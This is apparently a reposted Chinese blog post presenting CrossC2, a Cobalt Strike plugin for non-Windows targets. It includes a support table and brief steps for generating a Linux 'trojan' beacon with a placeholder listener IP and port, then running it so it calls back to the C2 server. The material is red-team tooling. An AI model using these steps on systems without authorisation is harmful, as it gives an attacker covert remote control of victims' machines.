后知后覺 發了一個大佬們用了很久的工具
一、簡述
CrossC2插件是為企業和紅團隊人員提供的安全框架,支持 CobaltStrike 對其他平臺的滲透測驗(Linux / MacOS /…),支持自定義模塊,并包括一些常用的滲透模塊,
利用CrossC2插件通過在Linux上執行木馬反彈一個CobaltStrike型別的shell,
CrossC2插件專案地址:https://github.com/gloxec/CrossC2
| Windows | Linux | MacOS | iOS | Android | Embedded | |
|---|---|---|---|---|---|---|
| Run Env (x86) | √ | |||||
| Run Env (x64) | √ | √ | √ | |||
| gen beacon (x86) | √ | √ | ||||
| gen beacon (x64) | √ | √ | ||||
| gen beacon (armv7) | ? | √ | ||||
| gen beacon (arm64) | √ | √ | ||||
| gen beacon (mips[el]) | ? |
受限描述:
- CobaltStrike: 暫時僅支持3.14最后一個版本(bug fixs), 以及4.x版本(詳見cs4.1分支).
- Linux: 特別老舊的系統可以選擇cna中的"Linux-GLIBC"選項(2010年左右)
- MacOS: 新系統僅支持64位程式
- iOS: sandbox
- Embedded: only *nix
- ? : 加載還在完善中
用法:
https://gloxec.github.io/CrossC2/zh_cn/usage/genCross.html
二、實驗
1.genCrossC2.Linux 檔案上傳到CobaltStrike服務端目錄下,
2.由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中選擇HTTPS進行監聽,服務端開啟監聽 windows/beacon_https/reverse_https 型別的beacon
3.生成木馬
./genCrossC2.Linux 監聽的IP 監聽的埠 null null Linux x64 test
4.執行木馬上線
5.成功上線
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/352121.html
標籤:其他